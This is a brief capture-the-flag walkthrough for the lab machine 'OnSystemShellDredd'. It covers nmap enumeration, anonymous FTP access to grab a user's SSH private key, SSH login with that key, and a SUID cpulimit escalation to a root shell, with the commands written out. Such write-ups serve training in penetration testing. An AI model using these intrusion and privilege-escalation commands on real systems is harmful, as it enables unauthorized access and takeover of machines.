OnSystemShellDredd

Nmap

sudo nmap 192.168.172.130 -p- -sS -sV

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
61000/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

FTP on the host is open to anonymous login. When logged in use ls -la to view hidden files. Upon moving into the .hannah directory ensure binary mode is enabled then grab the id_rsa.

Ensure to change the permissions on the id_rsa to make it usable.

chmod 600 id_rsa

Then proceed to login as the user hannah specifying port 61000.

ssh -p 61000 -i id_rsa hannah@192.168.172.130

Running linpeas on the target machine after transferring over finds the binary cpulimit has a SUID bit set.

Checking GTFOBins against this binary reports the following:

We can then use the following command to gain a root shell:

/usr/bin/cpulimit -l 100 -f -- /bin/sh -p

Last updated 3 years ago

hashtagNmap

Nmap